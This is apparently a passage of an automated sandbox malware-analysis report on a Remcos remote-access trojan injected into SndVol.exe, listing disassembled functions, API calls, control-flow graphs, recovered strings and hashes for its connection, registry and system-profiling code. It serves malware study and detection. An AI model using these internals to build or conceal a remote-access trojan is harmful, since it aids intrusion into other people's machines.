                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0292D783), ref: 0293BD75
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD78
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0292D783), ref: 0293BD85
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD88
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0292D783), ref: 0293BD99
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD9C
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0292D783), ref: 0293BDA9
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDAC
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0292D783), ref: 0293BDBD
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDC0
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0292D783), ref: 0293BDD1
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDD4
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0292D783), ref: 0293BDE5
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDE8
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0292D783), ref: 0293BDF5
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDF8
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0292D783), ref: 0293BE06
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 0292D790
                                                                                                                          • Part of subcall function 0292FCBA: __EH_prolog.LIBCMT ref: 0292FCBF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                        • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                                                        • API String ID: 2830904901-1478563138
                                                                                                                        • Opcode ID: 484f106dd2cbd512dc41df90529999ed412c8185d21a447bafcc2d60897da2c2
                                                                                                                        • Instruction ID: e14c2d85aa3f3cfca0ebb1fe7aadacb6cd768a7887b63a64ed7cd0ea659173d8
                                                                                                                        • Opcode Fuzzy Hash: 484f106dd2cbd512dc41df90529999ed412c8185d21a447bafcc2d60897da2c2
                                                                                                                        • Instruction Fuzzy Hash: 5B320820B443A06BEE19B774AC55B7F36CF9FC1710F04042DA44A5B2CEDEA49D1D8BA2
                                                                                                                        Function 02933FD4 Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 813sleepnetworkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 447 2933fd4-293401f call 2921faa call 293aa73 call 2921faa call 2921d64 call 2921e8f call 295a5e7 460 2934021-2934028 Sleep 447->460 461 293402e-293407c call 2921f66 call 2921d64 call 2921fbd call 293afc3 call 2924262 call 2921d64 call 292b125 447->461 460->461 476 29340f0-293418a call 2921f66 call 2921d64 call 2921fbd call 293afc3 call 2921d64 * 2 call 29285b4 call 29227cb call 2921eef call 2921eea * 2 call 2921d64 call 2925422 461->476 477 293407e-29340ed call 2921d64 call 29222f8 call 2921d64 call 2921e8f call 2921d64 call 29222f8 call 2921d64 call 2921e8f call 2921d64 call 29222f8 call 2921d64 call 2921e8f call 2924101 461->477 530 293419a-29341a1 476->530 531 293418c-2934198 476->531 477->476 532 29341a6-2934242 call 292541d call 2924cbf call 2925ce6 call 29227cb call 2921f66 call 293a686 call 2921eea * 2 call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2933f9a 530->532 531->532 559 2934244-293428a WSAGetLastError call 293bc76 call 2924c9e call 2921f66 call 293a686 call 2921eea 532->559 560 293428f-293429d call 29241f1 532->560 583 2934b54-2934b66 call 29247eb call 29220b4 559->583 566 29342ca-29342d8 call 2924915 call 292428c 560->566 567 293429f-29342c5 call 2921f66 * 2 call 293a686 560->567 579 29342dd-29342df 566->579 567->583 582 29342e5-2934432 call 2921d64 * 2 call 2924cbf call 2925ce6 call 29227cb call 2925ce6 call 29227cb call 2921f66 call 293a686 call 2921eea * 4 call 293a96d call 2933683 call 29282dc call 2960c51 call 2921d64 call 2921fbd call 29222f8 call 2921e8f * 2 call 293265d 579->582 579->583 647 2934446-293446d call 2921e8f call 2932513 582->647 648 2934434-2934441 call 292541d 582->648 595 2934b68-2934b88 call 2921d64 call 2921e8f call 295a5e7 Sleep 583->595 596 2934b8e-2934b96 call 2921d8c 583->596 595->596 596->476 654 2934474-2934ac7 call 2923b40 call 292cbf1 call 293adee call 293aec8 call 293ad46 call 2921d64 GetTickCount call 293ad46 call 293aca0 call 293ad46 * 2 call 293ac52 call 293aec8 * 5 call 292e679 call 293aec8 call 29227ec call 292275c call 29227cb call 292275c call 29227cb * 3 call 292275c call 29227cb call 2925ce6 call 29227cb call 2925ce6 call 29227cb call 292275c call 29227cb call 292275c call 29227cb call 292275c call 29227cb call 292275c call 29227cb call 292275c call 29227cb call 292275c call 29227cb call 292275c call 29227cb call 2925ce6 call 29227cb * 5 call 292275c call 29227cb call 292275c call 29227cb * 7 call 292275c call 2924468 call 2921eea * 50 call 2921e13 call 2921eea * 6 call 2921e13 call 29245d5 647->654 655 293446f-2934471 647->655 648->647 901 2934adb-2934ae2 654->901 902 2934ac9-2934ad0 654->902 655->654 904 2934ae4-2934ae9 call 292a767 901->904 905 2934aee-2934b20 call 2925415 call 2921f66 * 2 call 293a686 901->905 902->901 903 2934ad2-2934ad4 902->903 903->901 904->905 916 2934b22-2934b2e CreateThread 905->916 917 2934b34-2934b4f call 2921eea * 2 call 2921e13 905->917 916->917 917->583
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,00000029,029942F8,?,00000000), ref: 02934028
                                                                                                                        • WSAGetLastError.WS2_32 ref: 02934249
                                                                                                                        • Sleep.KERNELBASE(00000000,00000002), ref: 02934B88
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                                                                        • String ID: | $%I64u$5.3.0 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                                                                                        • API String ID: 524882891-4083769289
                                                                                                                        • Opcode ID: 5782a1c75d26d9b1a3f9c79f036cda7b2b81ad8051da0a447b7e4bcc5bedc9a9
                                                                                                                        • Instruction ID: ebf51167b86d534db101840d303cac0ec359a41050ab7488f3c2786111fe574c
                                                                                                                        • Opcode Fuzzy Hash: 5782a1c75d26d9b1a3f9c79f036cda7b2b81ad8051da0a447b7e4bcc5bedc9a9
                                                                                                                        • Instruction Fuzzy Hash: BC529D32E001249BDB19F774ECA1AEE737A9FE0310F5040ADD80AA6199EE706F5DCE55
                                                                                                                        Function 0292428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • connect.WS2_32(?,?,?), ref: 029242A5
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0292192B), ref: 029243CB
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0292192B), ref: 029243D5
                                                                                                                        • WSAGetLastError.WS2_32(?,?,?,0292192B), ref: 029243E7
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                        • API String ID: 994465650-2151626615
                                                                                                                        • Opcode ID: 1b60ad30ea10798df8cf40a4f4a43d7b1c0e9c68f69ddbebf63ceb132be77482
                                                                                                                        • Instruction ID: 7f655b372e8f92edffd01c09a53a254bd6bf60b6d835d6e7ac95cccba4a51669
                                                                                                                        • Opcode Fuzzy Hash: 1b60ad30ea10798df8cf40a4f4a43d7b1c0e9c68f69ddbebf63ceb132be77482
                                                                                                                        • Instruction Fuzzy Hash: 3A417071F00221B7EB04B77D8D0A87D7B5BEBC03247810129D41A0768AEF51A92C8BD3
                                                                                                                        Function 029247EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 029247FD
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924808
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924811
                                                                                                                        • closesocket.WS2_32(000000FF), ref: 0292481F
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924856
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 02924867
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0292486E
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02924880
                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02924885
                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0292488A
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924895
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 0292489A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3658366068-0
                                                                                                                        • Opcode ID: 813f9a3d6f61524d4a11fbebf8f9c496c74ab08eca3db6cc4fb95f7634bb2305
                                                                                                                        • Instruction ID: b435e3d398b1b2338ff72b6552a1fa6f475291bf500aa795d371ab1fa1ca1818
                                                                                                                        • Opcode Fuzzy Hash: 813f9a3d6f61524d4a11fbebf8f9c496c74ab08eca3db6cc4fb95f7634bb2305
                                                                                                                        • Instruction Fuzzy Hash: FB214931444B549FCB216B66DC08A66FBE2EF40724B104E2DE2E602AB0CB72B855DF44
                                                                                                                        Function 0292C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0292CA04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath
                                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                        • API String ID: 82841172-425784914
                                                                                                                        • Opcode ID: be51e2e909e155667b7818ac81cb78793b0d6194243d0067c021da216ecfd71a
                                                                                                                        • Instruction ID: 293ebbbf98d77676e014d880ef9fd9a46d414e741223406c467736fbe2a64434
                                                                                                                        • Opcode Fuzzy Hash: be51e2e909e155667b7818ac81cb78793b0d6194243d0067c021da216ecfd71a
                                                                                                                        • Instruction Fuzzy Hash: 574168321042205BD718FB24DC51DBFB7A9AED0710F50092EF54B660E9EE709E5DCE56
                                                                                                                        Function 0293A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0293B15B: GetCurrentProcess.KERNEL32(?,?,?,0292C914,WinDir,00000000,00000000), ref: 0293B16C
                                                                                                                          • Part of subcall function 02932513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 02932537
                                                                                                                          • Part of subcall function 02932513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 02932554
                                                                                                                          • Part of subcall function 02932513: RegCloseKey.KERNELBASE(?), ref: 0293255F
                                                                                                                        • StrToIntA.SHLWAPI(00000000,0298BC48,?,00000000,00000000,02994358,00000003,Exe,00000000,0000000E,00000000,0298556C,00000003,00000000), ref: 0293A4D9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 1866151309-2070987746
                                                                                                                        • Opcode ID: 04829e282e93547773dc796c467b405a5d9fa13ca12f0972e1670573641c7318
                                                                                                                        • Instruction ID: 8d4d4a1b5db89157396655d5692bc1f45b871de5080965b5c6b3a13362e15f4e
                                                                                                                        • Opcode Fuzzy Hash: 04829e282e93547773dc796c467b405a5d9fa13ca12f0972e1670573641c7318
                                                                                                                        • Instruction Fuzzy Hash: C2112F61A0021156D705B3A8DC7AD7F779FDBD0314F480428D546D31D1EA505D5B87A1
                                                                                                                        Function 02924915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1169 2924915-2924924 1170 29249b1 1169->1170 1171 292492a-2924931 1169->1171 1172 29249b3-29249b7 1170->1172 1173 2924933-2924937 1171->1173 1174 2924939-2924940 1171->1174 1175 2924987-29249af CreateEventA CreateThread 1173->1175 1174->1175 1176 2924942-2924982 GetLocalTime call 293ad46 call 2924c9e call 2921f66 call 293a686 call 2921eea 1174->1176 1175->1172 1176->1175
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 02924946
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02924994
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 029249A7
                                                                                                                        Strings
                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0292495C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                        • API String ID: 2532271599-1507639952
                                                                                                                        • Opcode ID: f27042551e243eebdcf5d773ef03733ccd2d5cb37ac7da19f3554a411e7f34fd
                                                                                                                        • Instruction ID: 43cb294f6f0a4e985c03bb080374403b627acd03f6c04861ffa4949a0460668d
                                                                                                                        • Opcode Fuzzy Hash: f27042551e243eebdcf5d773ef03733ccd2d5cb37ac7da19f3554a411e7f34fd
                                                                                                                        • Instruction Fuzzy Hash: 8F1132319042B43ADB21FBBA8808BDBBF9CBF86764F04001AE01962145CBB4845CCFF2
                                                                                                                        Function 029326D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1186 29326d2-29326e9 RegCreateKeyA 1187 2932722 1186->1187 1188 29326eb-2932720 call 29222f8 call 2921e8f RegSetValueExA RegCloseKey 1186->1188 1190 2932724-2932730 call 2921eea 1187->1190 1188->1190
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 029326E1
                                                                                                                        • RegSetValueExA.KERNELBASE(?,02986748,00000000,?,00000000,00000000,029942F8,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932709
                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932714
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValue
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 1818849710-4028850238
                                                                                                                        • Opcode ID: 9fed2bd385151fd46d18d4e2dc720d233521d8bb7a6177d34de779f8efe199c8
                                                                                                                        • Instruction ID: 3659f85c95775ed972ce8c8af6704468774d854ed85e1358b33e2d6dcc136831
                                                                                                                        • Opcode Fuzzy Hash: 9fed2bd385151fd46d18d4e2dc720d233521d8bb7a6177d34de779f8efe199c8
                                                                                                                        • Instruction Fuzzy Hash: DFF03A72940118FBDB02AFA0EC55EFE776DEF44790F108615FD06A6150EB71AE18DAA0
                                                                                                                        Function 02932513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1196 2932513-293253f RegOpenKeyExA 1197 2932572 1196->1197 1198 2932541-2932567 RegQueryValueExA RegCloseKey 1196->1198 1200 2932577-2932583 call 2921f66 1197->1200 1198->1197 1199 2932569-2932570 1198->1199 1199->1200
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 02932537
                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 02932554
                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0293255F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: e03b2dfa975768978691856dbe5dea4fb480c3d2ead68f958a4e9a974344bfa0
                                                                                                                        • Instruction ID: bcbad13a43870c6dacc5e8be99dbc834bb72fdb28b8a810f998e9d3106405724
                                                                                                                        • Opcode Fuzzy Hash: e03b2dfa975768978691856dbe5dea4fb480c3d2ead68f958a4e9a974344bfa0
                                                                                                                        • Instruction Fuzzy Hash: 07F0A476D40128BBDF219BA5DC48EEF7FBDEB44650F004465BA06E2100D7309F19DBA0
                                                                                                                        Function 029324B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1203 29324b7-29324df RegOpenKeyExA 1204 29324e1-2932509 RegQueryValueExA RegCloseKey 1203->1204 1205 293250f-2932512 1203->1205 1204->1205 1206 293250b-293250e 1204->1206
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 029324D7
                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,029942F8), ref: 029324F5
                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 02932500
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: f3bd23508ced78e371868dd5b564a30468709a156c6d1f3ff4755cafd4873eab
                                                                                                                        • Instruction ID: 2ee61a05f13c9b4eaa727d474cbd9ed3e4c010a66764c39c2f4fdd54bc74bf5f
                                                                                                                        • Opcode Fuzzy Hash: f3bd23508ced78e371868dd5b564a30468709a156c6d1f3ff4755cafd4873eab
                                                                                                                        • Instruction Fuzzy Hash: EAF01776D40208BFDF119FE09C15FEEBBBCEB04744F1084A1FA05E6180E6709B18AB90
                                                                                                                        Function 0293246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1207 293246e-293248d RegOpenKeyExA 1208 29324b2 1207->1208 1209 293248f-29324ac RegQueryValueExA RegCloseKey 1207->1209 1211 29324b4-29324b6 1208->1211 1209->1208 1210 29324ae-29324b0 1209->1210 1210->1211
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0292B996,029860E0), ref: 02932485
                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0292B996,029860E0), ref: 02932499
                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,0292B996,029860E0), ref: 029324A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: a0f4c4884ad49477732b3cf69436fc77fe92fdca95d4ed9e59a0fad714858513
                                                                                                                        • Instruction ID: d37dd5f83d106788e5530fa0fbf27ccf6269077cf134f04631e446e962cb7f89
                                                                                                                        • Opcode Fuzzy Hash: a0f4c4884ad49477732b3cf69436fc77fe92fdca95d4ed9e59a0fad714858513
                                                                                                                        • Instruction Fuzzy Hash: 0AE0ED71D45234FBDF325BE29C0DEEBBFACEF467A0B004454BD49A6201D2619E54E6E0
                                                                                                                        Function 029327D5 Relevance: 4.5, APIs: 3, Instructions: 31registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1212 29327d5-29327eb RegCreateKeyA 1213 2932818-293281b 1212->1213 1214 29327ed-2932812 RegSetValueExA RegCloseKey 1212->1214 1214->1213 1215 2932814-2932817 1214->1215
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,02985554), ref: 029327E3
                                                                                                                        • RegSetValueExA.KERNELBASE(02985554,000000AF,00000000,00000004,00000001,00000004,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 029327FE
                                                                                                                        • RegCloseKey.ADVAPI32(02985554,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 02932809
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1818849710-0
                                                                                                                        • Opcode ID: 8469bdc60660b6b3cdc59b5087b0a174abf1935ac58f44253ee35429d268c843
                                                                                                                        • Instruction ID: 899c44193f12882cb4c8efd43e03719aa3d1205c5df742777416a7b46606c316
                                                                                                                        • Opcode Fuzzy Hash: 8469bdc60660b6b3cdc59b5087b0a174abf1935ac58f44253ee35429d268c843
                                                                                                                        • Instruction Fuzzy Hash: 5AE03971A40208FBEF119FA09C06FEA7BACEB05B94F004460FA05E6180D2719E18ABA0
                                                                                                                        Function 0296B9BE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0296B9DF
                                                                                                                          • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
